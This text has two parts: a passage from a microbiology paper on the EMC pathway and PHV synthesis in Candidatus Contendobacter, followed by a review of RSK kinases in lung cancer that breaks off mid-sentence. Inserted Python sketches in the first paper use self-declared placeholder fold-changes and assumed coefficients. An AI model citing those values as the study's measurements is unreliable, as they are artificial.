To explore the distribution of the microbial community and the dominant GAOs in the system, metagenomic sequencing was performed to quantify relative abundances at the genus level during reactor operation. Two kinds of GAOs, Candidatus Contendobacter and Candidatus Competibacter, were enriched; the relative abundance of Candidatus Contendobacter was higher than that of Candidatus Competibacter from the beginning of reactor operation through the stable stage, indicating that Candidatus Contendobacter was the dominant GAO in the system (Fig. 3). At the beginning of reactor operation, Thauera was the dominant genus in the seeding sludge, followed by Nitrospira, Dechloromonas, Candidatus Accumulibacter and Candidatus Contendobacter. From day 20 to day 39 of reactor operation, the relative abundance of Candidatus Contendobacter increased from 2.6 to 6.9%, and that of Candidatus Competibacter increased from 1.0 to 2.0%. On day 39, Candidatus Contendobacter replaced Thauera as the dominant organism, with a relative abundance 3.5 times higher than that of Candidatus Competibacter. Although the relative abundance of Candidatus Contendobacter decreased slightly after day 39, it remained the dominant organism in our system. These results further indicated that the GAM characteristics of the system favored the core community member Candidatus Contendobacter.
The top five (TOP5) genera carrying succinate-propionate pathway genes in the system
Previous studies reported PHV/PHB ratios between 0.27 and 0.54, whereas the PHV/PHB ratio in our system was 0.22, lower than those previously reported (Table 1), which suggested that the PHV synthesis pathway differed from those of previous studies (Filipe et al. 2001; Lopez-Vazquez et al. 2007). Therefore, it was essential to identify the reactions relevant to PHV synthesis and enable a validated model simulation. Propionyl-CoA is the key intermediate in PHA synthesis. To elucidate the origin of propionyl-CoA during PHV synthesis, we analyzed the genus-level sources of the key genes of the succinate-propionate pathway, which is closely related to PHV synthesis. The succinate-propionate pathway converts succinyl-CoA produced by the TCA cycle to propionyl-CoA in three steps. In the first step, succinyl-CoA is converted to (R)-methylmalonyl-CoA, catalyzed by methylmalonyl-CoA mutase (MUT). In this study, Candidatus Contendobacter and Candidatus Competibacter were the only GAOs among the top five (TOP5) genera carrying the MUT gene, in which the MUT gene showed a high relative abundance (0.0-11.4% in Candidatus Contendobacter and 2.9-12.8% in Candidatus Competibacter) (Fig. 4a). These results showed that Candidatus Contendobacter and Candidatus Competibacter could convert succinyl-CoA to (R)-methylmalonyl-CoA. However, the abundances of the key genes of the other two steps, MCEEepi and E2.1.3.1-5s, were very low in the two GAOs (Fig. 4b, c). Overall, the abundances of the key genes of the succinate-propionate pathway were low and changed only slightly among the top five (TOP5) genera, suggesting that the succinate-propionate pathway was not the dominant pathway for PHV synthesis in Candidatus Contendobacter during operation.
The top five (TOP5) genera carrying EMC pathway genes in the system
The EMC pathway has been reported as an important source of several acyl-CoAs, including propionyl-CoA, in Methylobacterium extorquens (Schneider et al. 2012), but the role of the EMC pathway in GAOs remained unclear. In the EMC pathway, seven key genes, phbB, phaJ, ccr, ecm, mcd, mch, and mcl, are involved in the synthesis of propionyl-CoA from acetyl-CoA, and the abundances of the top five (TOP5) genera containing these seven key genes changed markedly during system operation. Metagenome analysis showed that the relative abundance of Candidatus Contendobacter ranged from 3.2 to 39.5%, significantly higher than that of the other genera from day 20 onward, and it gradually increased with time. The changes in the relative abundance of Candidatus Contendobacter in the system were consistent with the changes in the relative abundances of the seven key EMC pathway genes, phbB, phaJ, ccr, ecm, mcd, mch, and mcl (Fig. 5a-g). In contrast, Candidatus Competibacter, the other GAO, contained only five of the regulatory genes, namely phaJ, ccr, ecm, mcd, and mch (Fig. 5b-f), further indicating that only Candidatus Contendobacter could synthesize propionyl-CoA independently through the EMC pathway.
On day 39, we compared the relative abundances of the key genes of the EMC pathway and the succinate-propionate pathway in Candidatus Contendobacter and Candidatus Competibacter (Fig. 6a). Candidatus Contendobacter contained all seven key genes of the EMC pathway, whereas Candidatus Competibacter contained only five key genes of the EMC pathway. In contrast, for the succinate-propionate pathway, Candidatus Contendobacter and Candidatus Competibacter contained only MUT, the first key gene of the pathway, while the other two regulatory genes, MCEEepi and E2.1.3.1-5s, were not present in the two GAOs (Fig. 6b), suggesting that the EMC pathway played a crucial role in PHV synthesis in Candidatus Contendobacter.

Fig. 5 The changes in the abundances of the top five genera containing the key genes that regulate propionyl-CoA production via the EMC pathway. a-g The abundance changes of the top five genera for phbB, phaJ, ccr, ecm, mcd, mch, and mcl, respectively.
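A small sketch of the day-39 gene-presence comparison just described; the gene sets are transcribed from the text, while the completeness check itself is an illustrative helper rather than the paper's method.

```python
# Hypothetical sketch of the day-39 gene-presence comparison. Gene sets
# are taken from the text; the check is illustrative only.
EMC_GENES = {"phbB", "phaJ", "ccr", "ecm", "mcd", "mch", "mcl"}
SUC_PROP_GENES = {"MUT", "MCEEepi", "E2.1.3.1-5s"}

detected = {
    "Candidatus Contendobacter": {
        "EMC": {"phbB", "phaJ", "ccr", "ecm", "mcd", "mch", "mcl"},
        "succinate-propionate": {"MUT"},
    },
    "Candidatus Competibacter": {
        "EMC": {"phaJ", "ccr", "ecm", "mcd", "mch"},
        "succinate-propionate": {"MUT"},
    },
}

for genus, pathways in detected.items():
    for pathway, required in (("EMC", EMC_GENES),
                              ("succinate-propionate", SUC_PROP_GENES)):
        found = pathways[pathway]
        print(f"{genus} / {pathway}: {len(found)}/{len(required)} genes, "
              f"complete={found == required}")
```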
Gene expression validation of the propionyl-CoA synthesis pathway in Candidatus Contendobacter
Although many studies have assessed PHV synthesis from metagenomic data, few have analyzed it at the level of real-time expression. To further validate the propionyl-CoA synthesis pathway in Candidatus Contendobacter, we measured the transcriptional expression of the key EMC pathway genes after the system stabilized. Except for phbB and phaJ, the remaining five genes, ccr, ecm, mcd, mch, and mcl, were transcriptionally upregulated during reactor operation: ecm and mcl were upregulated more than two-fold, and ccr, mcd, and mch more than four-fold. These results indicated that the EMC pathway became more active as the abundance of Candidatus Contendobacter increased. From day 39, the transcriptional expression of ccr, mcd, and mch was much higher than that of phbB, phaJ, ecm, and mcl, indicating that these three genes were the most actively expressed in the EMC pathway (Fig. 7). These results further validated that propionyl-CoA was synthesized through the EMC pathway by Candidatus Contendobacter.
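The fold-change grouping above can be expressed as a simple classification. In the sketch below, the numeric fold-changes are illustrative placeholders chosen to be consistent with the reported categories, not the paper's measured values; only the thresholding logic is the point.

```python
# Hypothetical sketch: classifying transcriptional fold-changes the way the
# text groups them (>2-fold vs >4-fold). Values are placeholders.
fold_change = {
    "ecm": 2.4, "mcl": 2.8,              # reported as >2-fold
    "ccr": 4.6, "mcd": 5.1, "mch": 4.3,  # reported as >4-fold
    "phbB": 1.1, "phaJ": 0.9,            # not upregulated
}

def classify(fc: float) -> str:
    if fc > 4:
        return "strongly upregulated (>4-fold)"
    if fc > 2:
        return "upregulated (>2-fold)"
    return "not upregulated"

for gene, fc in sorted(fold_change.items(), key=lambda kv: -kv[1]):
    print(f"{gene}: {fc:.1f}-fold -> {classify(fc)}")
```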
The GAO enrichment model exhibited the typical characteristics of GAM
In EBPR systems, the presence of GAOs is of interest because their metabolism closely resembles that of PAOs, the only difference being the absence of phosphorus cycling (Roy et al. 2021). However, it has been challenging to distinguish PAO and GAO metabolisms and to define the role of GAOs in full-scale EBPR plants.

Fig. 6 The analysis of key genes in Candidatus Contendobacter and Candidatus Competibacter on day 39. a Relative abundance of the key genes of the EMC pathway. b Relative abundance of the key genes of the succinate-propionate pathway.

Fig. 7 The changes in key gene expression in the EMC pathway during reactor operation.
In this study, Candidatus Contendobacter, rather than Candidatus Competibacter, which is widely reported in many studies (Lanham et al. 2013; Ong et al. 2014), was the dominant GAO in our system. Candidatus Competibacter is the most common GAO in both lab-scale reactors and full-scale biological wastewater treatment facilities (Nielsen et al. 2019; Yuan et al. 2020). Candidatus Contendobacter and Candidatus Competibacter are affiliated with Competibacter-lineage subgroups 5 and 1, respectively, suggesting that they may have different characteristics. In our system, Candidatus Contendobacter was the dominant GAO, possibly because the operating mode favored the growth of Candidatus Contendobacter over that of Candidatus Competibacter. Based on these findings, it can be concluded that the mode of decanting after the anaerobic period effectively limited the growth of PAOs and successfully enriched the dominant GAO Candidatus Contendobacter. Compared with previous GAO models, our system showed several differences: our model degraded more glycogen, synthesized more PHAs, and produced relatively less PHV. A source of reducing equivalents, such as reduced nicotinamide adenine dinucleotide (NADH), is required under anaerobic conditions for PHA synthesis. Several studies (McIlroy et al. 2014) have suggested that excess reducing equivalents are produced when the amount of glycogen degraded anaerobically exceeds the reducing equivalents required for the anaerobic uptake of acetate by GAOs. This excess is theoretically balanced by the flux of pyruvate through the reductive branch of the tricarboxylic acid (TCA) cycle and the succinate-propionate pathway to form propionyl-CoA. This thioester is in turn condensed with acetyl-CoA to form PHV, as evidenced by the production of PHV from acetate in GAO enrichments (Oehmen et al. 2007). Previous studies further showed that, compared with phosphorus accumulating metabolism (PAM), more PHV is produced via GAM, suggesting that PHV formation consumes the excess reducing equivalents to balance the internal reducing power (NADH) (Acevedo et al. 2012). Since our system degraded more glycogen, the excess reducing equivalents should theoretically have been consumed by the succinate-propionate pathway to produce more PHV, yet the amount of PHV synthesized was lower than reported for previous models. Therefore, we have reason to infer that the GAO enrichment system dominated by Candidatus Contendobacter has its own characteristic way of utilizing the excess reducing power for propionyl-CoA formation and PHV synthesis.
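The reducing-power argument above can be made concrete with a toy balance. The sketch below is a hypothetical, highly simplified NADH bookkeeping exercise; all coefficients are assumed round numbers for illustration (real GAO models use C-mol-based stoichiometry), so only the direction of the conclusion matters, not the values.

```python
# Hypothetical, highly simplified anaerobic redox bookkeeping. All
# coefficients are assumed illustrative values, not model parameters.
nadh_per_cmol_glycogen = 0.33  # assumed NADH yield from glycogen glycolysis
nadh_per_cmol_phb = 0.25       # assumed NADH consumed per C-mol PHB formed
nadh_per_cmol_pcoa = 0.67      # assumed NADH absorbed per C-mol propionyl-CoA

glycogen_degraded = 1.0  # C-mol (normalized)
phb_formed = 0.9         # C-mol

excess = (glycogen_degraded * nadh_per_cmol_glycogen
          - phb_formed * nadh_per_cmol_phb)
pcoa_needed = max(excess, 0.0) / nadh_per_cmol_pcoa
print(f"excess NADH: {excess:.2f} mol; propionyl-CoA needed to absorb it: "
      f"{pcoa_needed:.2f} C-mol")
# If a pathway absorbs more NADH per propionyl-CoA formed, less
# propionyl-CoA (hence less PHV) is made for the same excess -- consistent
# with the low PHV/PHB ratio observed in this system.
```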
The succinate-propionate pathway cannot contribute to PHV synthesis

PHAs, a class of biodegradable polymers, are synthesized as energy storage molecules by many bacteria (Mannina et al. 2020; Pisco et al. 2009). GAOs utilize glycogen to obtain the energy and reducing equivalents needed for VFA uptake and PHA storage. Under aerobic conditions, glycogen is regenerated from PHAs, which then supply energy and reducing power for GAO growth. PHAs are generally synthesized from acetyl-CoA and propionyl-CoA. Propionyl-CoA can be synthesized via two potential pathways: the succinate-propionate pathway and the ethylmalonyl-CoA (EMC) pathway (De Meur et al. 2018; Schneider et al. 2012). In the former, propionyl-CoA is synthesized via succinyl-CoA and (R)-methylmalonyl-CoA, intermediate metabolites of the TCA cycle (McIlroy et al. 2014); in the latter, it is synthesized from the conversion of acetyl-CoA. Finally, PHV is synthesized from propionyl-CoA condensed with acetyl-CoA. In this study, gene source analysis related the three key genes of the succinate-propionate pathway to the top seven genera of the community. The results indicated that the MUT gene was present in Candidatus Contendobacter and Candidatus Competibacter at a high relative abundance. However, the other two regulatory genes, MCEEepi and E2.1.3.1-5s, were not detected in the two GAOs and showed significantly low relative abundances overall, especially E2.1.3.1-5s (Fig. 6b). These results implied that it was difficult for the GAOs to synthesize propionyl-CoA via the succinate-propionate pathway in our system.
The EMC pathway: a novel propionyl-CoA synthesis pathway for PHV in Candidatus Contendobacter
In the present study, gene source analysis indicated that all seven key genes of the EMC pathway were located in Candidatus Contendobacter, whereas Candidatus Competibacter contained only five of them (Fig. 6a), suggesting that propionyl-CoA in Candidatus Contendobacter could be synthesized through the complete EMC pathway. Candidatus Contendobacter predominantly produced propionyl-CoA through the EMC pathway, which in turn supplied the substrate for PHV synthesis. The relative abundances of the key EMC pathway genes, phbB, phaJ, ccr, ecm, mcd, mch, and mcl, varied considerably in Candidatus Contendobacter. Previous studies reported that these seven genes are located at key nodes of the EMC pathway and play an important role in regulating its core enzymes (De Meur et al. 2018; Schneider et al. 2012). Because Candidatus Competibacter possessed only five of the core EMC pathway genes, it could not synthesize propionyl-CoA or PHV independently, which further suggested that Candidatus Contendobacter was mainly responsible for PHV production through the EMC pathway in our system.
Compared with the classic GAO models (Table 1), we also found that glycogen degradation in the anaerobic phase was greater than in other GAO models. One reason could be that, to balance an equivalent amount of reducing power, the EMC pathway in Candidatus Contendobacter produces less propionyl-CoA than the succinate-propionate pathway; another could be that more intermediates of the EMC pathway participate in other pathways. For example, mesaconyl-CoA in the EMC pathway also participates in the glyoxylate and dicarboxylate metabolism pathway, which could affect the amount of propionyl-CoA synthesized in different GAO models. Candidatus Contendobacter in our system was more inclined to invoke the EMC pathway to synthesize propionyl-CoA, and consequently played a pivotal role in PHV synthesis. Gene source analysis also showed that Candidatus Contendobacter was the main bacterium expressing the EMC pathway genes in the system. In this manner, Candidatus Contendobacter synthesized the key substrate for PHV synthesis, propionyl-CoA, through the EMC pathway.
In summary, we successfully constructed a GAO enrichment system in which the dominant organism, Candidatus Contendobacter, exhibited classic GAM. We found that the ethylmalonyl-CoA (EMC) pathway was the crucial pathway supplying propionyl-CoA for poly-β-hydroxyvalerate (PHV) synthesis in Candidatus Contendobacter. Gene source analysis showed that the expression of the EMC pathway genes increased with the enrichment of Candidatus Contendobacter, further validating that propionyl-CoA was synthesized by Candidatus Contendobacter predominantly via the EMC pathway. Our work reveals a novel mechanism underlying PHV synthesis through the EMC pathway and improves our understanding of the intracellular storage metabolism of GAOs. | 2022-03-27T06:22:34.251Z | 2022-03-25T00:00:00.000 | {
"year": 2022,
"sha1": "f3c362d6d4b4bd4cc059b25d396d5b991bc7eaa6",
"oa_license": "CCBY",
"oa_url": "https://amb-express.springeropen.com/track/pdf/10.1186/s13568-022-01380-3",
"oa_status": "GOLD",
"pdf_src": "Anansi",
"pdf_hash": "45600535726f2d2ce952c958e7dbffc1708ebe73",
"s2fieldsofstudy": [
"Environmental Science",
"Biology",
"Chemistry"
],
"extfieldsofstudy": [
"Medicine"
]
} |
14411102 | pes2o/s2orc | v3-fos-license | p90 ribosomal S6 kinase: a potential therapeutic target in lung cancer
A global survey of cancer has shown that lung cancer accounts for the most new cancer cases and cancer deaths in men worldwide. The mortality from lung cancer exceeds the combined mortality from breast, prostate and colorectal cancers. The two major histological types of lung cancer are non-small cell lung cancer (NSCLC), accounting for about 85 % of cases, and small cell lung cancer, accounting for 15 % of cases. NSCLC, the more prevalent form of lung cancer, is often diagnosed at an advanced stage and has a very poor prognosis. Many factors have been shown to contribute to the development of lung cancer in humans, including tobacco smoking, exposure to environmental carcinogens (asbestos or radon) and genetic factors. Despite the advances in treatment, lung cancer remains one of the leading causes of cancer death worldwide. Interestingly, the overall 5-year survival from lung cancer has not changed appreciably in the past 25 years. For this reason, novel and more effective treatments and strategies for NSCLC are critically needed. p90 ribosomal S6 kinase (RSK), a serine/threonine kinase that lies downstream of the Ras–MAPK (mitogen activated protein kinase) cascade, has been demonstrated to be involved in the regulation of cell proliferation in various malignancies through indirect (e.g., modulation of transcription factors) or direct effects on the cell-cycle machinery. Increased expression of RSK has been demonstrated in various cancers, including lung cancer. This review focuses on the role of RSK in lung cancer and its potential therapeutic application.
Background
Lung cancer has emerged as a major public health problem and is the leading cause of cancer-related death in both men and women worldwide [1,2]. The expected number of lung cancer deaths in the U.S. in 2015 is 158,040 [1]. Unfortunately, standard treatment modalities such as chemotherapy, radiotherapy, and surgery have reached a plateau [3]. Therefore, research efforts to identify alternatives to conventional treatment are needed. A better understanding of the molecular origin and pathophysiology of lung cancer is essential to developing novel molecular targets for the treatment and prevention of lung cancer.
Two major forms of lung carcinoma exist: non-small cell lung cancer (NSCLC), which constitutes approximately 85 % of all lung cancers, and small cell lung cancer (SCLC), which accounts for 15 % of all lung cancers. The 5-year survival rate is about 18 % for NSCLC [4] and 6 % for small cell lung cancer [5]. The three major histologic subtypes of NSCLC are adenocarcinoma, squamous cell carcinoma and large cell lung cancer. Adenocarcinoma, the most common histological variant seen in non-smokers and the one with the best prognosis, accounts for 40 % of all lung cancers [6]. It is also the most common variant seen in females and adults less than 60 years of age [7]. This review focuses on the molecular mechanisms and potential therapeutic targets for lung cancer, with emphasis on lung adenocarcinomas.

Tumor cells acquire a range of adaptations to tolerate the oncogenic changes [8]. The cellular adaptations attributed to lung cancer include self-sufficient growth signals due to mutations in proto-oncogenes; insensitivity to anti-proliferative signals as a result of mutations in tumor suppressor genes; evasion of apoptosis; unlimited replicative potential; and detachment of tumor cells from the extracellular matrix, which leads to invasion of the surrounding tissue and basal lamina. Tumor cells also have the capacity for sustained angiogenesis, and they travel through the bloodstream and migrate to distant sites, leading to the formation of metastatic lesions [8,9]. Cancerous cells have also been demonstrated to have a reversed pH gradient compared with normal adult cells: they exhibit a constitutively higher intracellular pH (pHi) and a lower extracellular pH (pHe) [10]. This increased pHi favors cell proliferation, cell survival, evasion of apoptosis and cell migration, and promotes tumor invasion [10]. An understanding of the mutated oncogenes, genetic alterations and cellular adaptations has paved the road for identifying molecular therapeutic targets.
Epidermal growth factor and the epidermal growth factor receptor in lung adenocarcinomas
Epidermal growth factor receptor (EGFR) is overexpressed in 32-81 % of NSCLC [11]. EGFR plays a major role in activating several downstream signaling pathways, such as Ras/Raf/MEK/MAPK and the pathway consisting of phosphoinositide 3-kinase (PI3K), Akt, and the mammalian target of rapamycin (mTOR). Activation of these major downstream signaling pathways contributes to cell proliferation, increased survival, invasiveness, metastatic spread, and angiogenesis in tumor cells [2]. Numerous therapeutic agents are available to target EGFR in NSCLC, including erlotinib, gefitinib and cetuximab. Despite the importance of EGFR in mediating NSCLC, many of the available therapeutic agents targeting EGFR are ineffective [11]. Acquired resistance to anti-EGFR agents also results from secondary mutations, specifically in exon 20 of the EGFR gene [3,8]. Recent studies have also suggested that Ras mutations in lung adenocarcinomas are associated with resistance to EGFR tyrosine kinase inhibitors (TKI) [3]. In addition, persistent activity of the mitogen activated protein kinase/extracellular-signal-regulated kinase (MAPK/ERK) pathway and the PI3K/Akt kinase pathway could contribute to the resistance of NSCLC to EGFR inhibitors [12]. Other proposed resistance mechanisms to EGFR inhibitors include amplification of the MET proto-oncogene, which activates the PI3K pathway independently of EGFR [13], and activation of other tyrosine kinase receptors such as the insulin-like growth factor receptor 1 [2]. This has directed research activity towards identifying other molecular targets, such as Ras, Raf, MAPK and ERK, which may be beneficial in the management of lung adenocarcinomas.
Ras proto-oncogene
The Ras proto-oncogene plays an important role in the transduction of growth-promoting signals from the cell membrane to the nucleus and the resulting cell proliferation [9]. The Ras proto-oncogene family (KRas, HRas, NRas and RRas) encodes four highly homologous 21 kDa membrane-bound proteins. Proteins encoded by the Ras genes exist in two states: an active state, in which GTP is bound to Ras, and an inactive state, in which the GTP has been cleaved to GDP through the intrinsic GTPase activity [3]. The GTPase Ras activates Raf (the A-, B- and C-Raf isoforms) [14]. The signal for cell proliferation is ultimately transmitted by a cascade of Ras-dependent kinases, which activates the MAPKs. It is noteworthy that 15-30 % of lung adenocarcinomas harbor activating mutations in Ras family members, especially KRas [3]. Mutations in Ras induce defects in its intrinsic GTPase activity, resulting in continuous cell proliferation [9]. The importance of KRas in lung carcinomas makes it a promising therapeutic target [8,15]. However, Ras inhibitors (farnesyl transferase inhibitors), which inhibit post-translational modification and membrane localization of Ras proteins, have been unsuccessful in clinical trials. This could be attributed to the fact that these inhibitors are not selectively active in tumors with KRas or NRas mutations [8,15]. Recent research has focused on investigating downstream effectors of Ras, including the MAPKs, since they control fewer of the downstream pathways [8,16].
Mitogen activated protein kinases and lung adenocarcinomas
The MAPK/ERK pathway is activated by various extracellular stimuli, including mitogens, cytokines, growth factors and cellular stresses [17]. The binding of EGF to the EGFR activates the Ras proto-oncogene, which then activates the Raf kinase. In turn, Raf phosphorylates and activates the MAPK/ERK kinases (MEK)1/2, dual-specificity protein kinases, which activate ERK1/2. Once activated, ERK1/2 phosphorylates several substrates, including members of the RSK (90 kDa ribosomal S6 kinase) family [14]. The Ras-MAPK cascade also activates the PI3K/AKT pathway, which regulates normal cell proliferation, survival, growth and differentiation [8].
Mutations or overexpression of many of the signaling components in the MAPK pathway can confer oncogenic potential and lead to several human cancers [17,18]. Activation of Ras/Raf/MEK/MAPK via activating mutations in KRas occurs in approximately 30 % of adenocarcinomas [3]. Activation of downstream signaling pathways such as PI3K and MAPK occurs independently of EGFR signaling, thereby rendering KRas-mutant tumors resistant to anti-EGFR agents and chemotherapy [19]. Therefore, the downstream effectors of this pathway represent an untapped pool of possible therapeutic targets in the treatment of lung cancer. Currently, two MEK1/2 inhibitors, selumetinib and trametinib, have been tested in many different cancer types, including NSCLC [17]. Selumetinib, the agent furthest in development, raised a concerning rate of hospitalization, grade 3 or 4 neutropenia, and febrile neutropenia [17]. Therefore, research efforts have been directed to identifying a smaller set of effectors, such as RSK, that are less likely to cause severe adverse effects [16,20].
RSK family of kinases
Efforts to identify the kinase activity responsible for the phosphorylation of ribosomal protein S6 (rpS6) led to the purification, by the Erikson and Maller laboratories in 1985, of an intracellular kinase that phosphorylated the 40S ribosomal subunit from unfertilized Xenopus laevis eggs. This kinase was initially referred to as ribosomal S6 kinase (S6K) [21]. The identification of two protein kinases of 85-90 kDa (S6KI and S6KII) by biochemical purification led to the cloning of cDNAs encoding highly homologous proteins that were later renamed p90 ribosomal S6 kinase [14]. The RSK family of proteins comprises a group of highly conserved serine/threonine kinases that lie downstream of the Ras-MAPK pathway and regulate diverse cellular processes such as cell growth and motility, cell proliferation and cell survival [14,18].
Structure of RSK
The structure of RSK is characterized by two distinct kinase domains separated by a linker region of about 100 amino acids and flanked by N- and C-terminal ends [18]. The RSKs are 73-80 % identical to each other and are most divergent in their N- and C-terminal sequences [14,22]. The carboxyl-terminal kinase domain (CTKD) is closely related to the calcium/calmodulin-dependent protein kinase (CAMK) family. In contrast, the amino-terminal kinase domain (NTKD) is homologous to that of the AGC kinases. The CTKD is responsible for autophosphorylation of RSK, and the NTKD is involved in substrate phosphorylation [18]. Finally, the C-terminal region contains an ERK1/2 docking site, also known as the D-domain, which is responsible for the docking and activation of RSK by ERK1/2 [22].
RSK family
In humans, the RSK family comprises four isoforms (RSK1 to -4) and two structurally related cousins, called RSK-like protein kinase/mitogen- and stress-activated kinase-1 (RLPK/MSK1) and RSK-B (MSK2) [22]. Analysis of the expression patterns of the RSK isoforms showed that RSK1 mRNA is most abundant in the lung, kidney, pancreas, bone marrow and T cells. RSK2 mRNA is predominantly found in T cells, lymph nodes, and the prostate. RSK3 transcripts are mainly expressed in the lung, brain, spinal cord, and retina. Interestingly, RSK4 mRNA expression in both adult and embryonic tissues is much lower than that of the other three isoforms, but Northern blotting of lysates from adult mouse tissues has revealed expression of RSK4 mRNA in the brain, cerebellum, heart, renal tissue and skeletal muscle [18,22].
Activators of RSK
RSKs are directly phosphorylated and activated by ERK1/2 and phosphoinositide-dependent protein kinase 1 (PDK1) in response to various stimuli, including growth factors, neurotransmitters and phorbol esters [18]. The MSKs are potently activated by both the ERK1/2 and the p38 pathways and are generally thought to be more responsive to cellular stress [18,23]. Unlike the RSKs, MSK is usually located in the nucleus of cells and phosphorylates transcription factors [24]. Mutational analysis revealed that four phosphorylation sites (Ser221, Ser363, Ser380, and Thr573 in human RSK1) are essential for RSK activation upon mitogenic stimulation [10,19]. The phosphorylation of Thr573 in the CTKD occurs following ERK activation, which also requires ERK docking at the D-domain. Ser380 is autophosphorylated by the activated CTKD [18]. Phosphorylation of Ser221 in the NTKD is mediated by PDK1 for RSK1-3, which leads to complete activation of RSK. This is further emphasized in PDK1-deficient cells, in which mitogens do not stimulate RSK1-3 activity [14]. Once activated, the RSKs may remain associated with the membrane, remain in the cytosol, or translocate to the nucleus, and can eventually phosphorylate substrates throughout the cell [18].
Biological function of RSK isoforms
The biological function of the RSK isoforms is to regulate cell-cycle progression and cell proliferation, cell growth and protein synthesis, nuclear signaling, cell migration and cell survival [14,23].
Activation of cytosolic and nuclear proteins through phosphorylated RSK
Activation of the RSK protein kinase results in the phosphorylation of functionally diverse RSK substrates in the cytosol and nucleus. In the cytosol, phosphorylated RSK substrates include glycogen synthase kinase 3 (GSK3), protein phosphatase 1, LKB1, L1CAM (a neural cell adhesion molecule), the Ras exchange factor, and the membrane-associated tyrosine- and threonine-specific cyclin-dependent kinase 1 (cell division cycle protein) [17]. Nuclear translocation of phosphorylated RSK following mitogenic stimulation leads to phosphorylation of a variety of transcription factors, including CREB, CREB-binding protein (CBP), serum response factor (SRF), p300, ER81, oestrogen receptor-α (ERα), c-Fos, nuclear factor-κB (NF-κB), NFATc4, NFAT3 and the transcription initiation factor TIF1A [23,24]. Activation of these cytosolic and nuclear proteins contributes to the initiation and progression of tumorigenesis [23].
RSK and cell cycle machinery
RSKs are involved in the regulation of cell-cycle progression through phosphorylation of several mediators of the cell-cycle machinery. RSK-mediated phosphorylation inactivates the membrane-associated tyrosine- and threonine-specific CDC2 inhibitory kinase-1 (Myt1), leading to G2-M cell-cycle progression [18]. RSK1 and RSK2 have also been shown to promote G1-phase progression by phosphorylating the cyclin-dependent kinase (CDK) inhibitor p27KIP1. In addition, RSK phosphorylates serum response factor (SRF) and contributes to the transcriptional activation of c-FOS. Activation of c-FOS results in the activation of cyclin D1, promoting G1-S phase progression [18]. RSK phosphorylates and inhibits glycogen synthase kinase 3 (GSK3), which has been suggested to promote stabilization of cyclin D1 and MYC, resulting in cell-cycle progression and cell survival [18,23]. In addition, RSK phosphorylates eEF2K and the translation-initiation factor eIF4B, which in turn stimulates the recruitment of eIF4B to the translation-initiation complex and contributes to cell growth and survival [14]. The phosphorylation of transcription factors such as CREB by RSK1 and RSK2 promotes cell survival by activating pro-survival genes such as members of the B cell lymphoma protein-2 (Bcl2) family [22]. Clearly, activation of RSK is critical for the phosphorylation of numerous mediators involved in the cell-cycle machinery.
RSK and apoptosis
High levels of endogenous Bcl2 are expressed in several lung cancer cell lines, including those from NSCLC and SCLC [9]. The fate of these cancer cells is largely dependent on the balance between inhibitory and stimulatory apoptosis signals from the Bcl2 family. The Bcl2 subfamily members, including Bcl2, Bcl-XL, and Mcl-1, inhibit apoptosis, whereas the Bax subfamily, consisting of Bax and Bak, as well as the BH3-only subfamily, including Bad, Bid, Bok, Bik, and Bim, promotes apoptosis [25].
RSK enhances cell survival via anti-apoptotic mechanisms [16,22]. RSK phosphorylates the pro-apoptotic protein Bad and enhances its binding to 14-3-3 proteins, which prevents Bad from antagonizing the pro-survival function of Bcl-XL [22]. RSK-mediated phosphorylation of the death-associated protein kinase (DAPK) leads to inhibition of its pro-apoptotic function [26]. RSK1/2-mediated phosphorylation of the tumor suppressor Bim-EL prevents its pro-apoptotic function [22,27]. RSK1 directly inhibits caspase activity, leading to increased cell survival [28]. Taken together, these data indicate that RSKs are closely involved in cell proliferation and survival, making them promising therapeutic targets for the treatment of cancer.
RSK and lung cancer
RSKs have been demonstrated to be overexpressed or hyperactivated in several cancers, including breast cancer, lung cancer, prostate cancer, head and neck squamous cell carcinoma, ovarian carcinoma, multiple myeloma, melanoma and osteosarcoma [16,29]. Different RSK isoforms behave differently depending on the type of cancer.
Activation or overexpression of RSK in lung cancer cells inhibits cell death via inactivation of the pro-apoptotic protein Bad [16]. Similarly, Bim-EL, which is sequentially phosphorylated by ERK and RSK1 or RSK2, is decreased in NSCLC cells with EGFR-activating mutations; this phosphorylation results in proteasomal degradation of Bim-EL and increased cell survival [30]. When the H-Ras/ERK pathway is activated in tumor cells, Bim-EL is eliminated by proteasomal degradation [27]. Additionally, the expression of DAPK, which behaves as a tumor suppressor, is commonly silenced in lung cancer through DNA methylation [14]. Lara and colleagues observed that RSK4 is overexpressed in more than 50 % of primary malignant lung cancers, although its levels are undetectable in normal cells [22]. Interestingly, a previous report by Lara et al. demonstrated that knockdown of p90RSK isoform 1 enhanced the metastatic potential of A549 lung adenocarcinoma cells. Similarly, an siRNA kinome library screen in A549 cells demonstrated that silencing p90RSK isoform 1 increased migration and invasion [30]. Moreover, Lara et al. [29] reported increased migration in A549 cells caused by RSK2 and RSK4. Clearly, the exact roles and signaling pathways of the respective RSK isoforms in lung cancer remain unknown.
RSK inhibitors
The identification of RSK inhibitors has uncovered an unexpected link between RSK activity and cell proliferation. Several pan-RSK small-molecule inhibitors exist, including two ATP-competitive inhibitors that target the NTKD (SL-0101 and BI-D1870) and an irreversible inhibitor of the CTKD, FMK [22]. The first specific inhibitor identified for p90 RSK was SL0101, which was isolated from the tropical plant Forsteronia refracta. When tested against a panel of 70 kinases, it targeted RSK1 and RSK2 in the nanomolar range (IC50 for RSK2, 90 nmol/L at 10 mmol/L ATP) while having no significant activity against the other AGC kinases tested [28]. The dihydropteridinone BI-D1870 is a reversible inhibitor that competes with ATP by binding to the NTKD ATP-interacting sequence. BI-D1870 is remarkably selective for RSK relative to other AGC kinases [31], and its in vitro IC50 is approximately 15-30 nM at an ATP concentration of 100 μM [32]. In cells, a concentration of 10 μM BI-D1870 is required to completely inhibit the phosphorylation of RSK substrates [32]. The pyrrolopyrimidine FMK (fluoromethylketone) is an irreversible inhibitor that covalently modifies the CTKD of RSK1, RSK2 and RSK4. FMK is a potent and specific inhibitor of RSK and was shown to inhibit RSK2 with an IC50 of 15 nM and an EC50 of 200 nM in vitro [33]. Recently, another CTKD inhibitor, dibenzyl trisulfide, has been isolated from the plant Petiveria alliacea L.; it specifically inhibits the RSK1 isoform at a concentration of 10 µM [20]. The discovery of RSK-specific inhibitors will help to advance the knowledge of RSK-mediated mechanisms in lung cancer and to test the potential of these inhibitors in pre-clinical studies. Our own unpublished data suggest that exposure of A549 lung adenocarcinoma cells to BI-D1870 decreases RSK1 protein expression and is associated with decreased cell migration and proliferation. Indeed, with the discovery of RSK-specific inhibitors, further studies will need to be carried out to verify the efficacy of RSK inhibitors as single agents or in combination with other 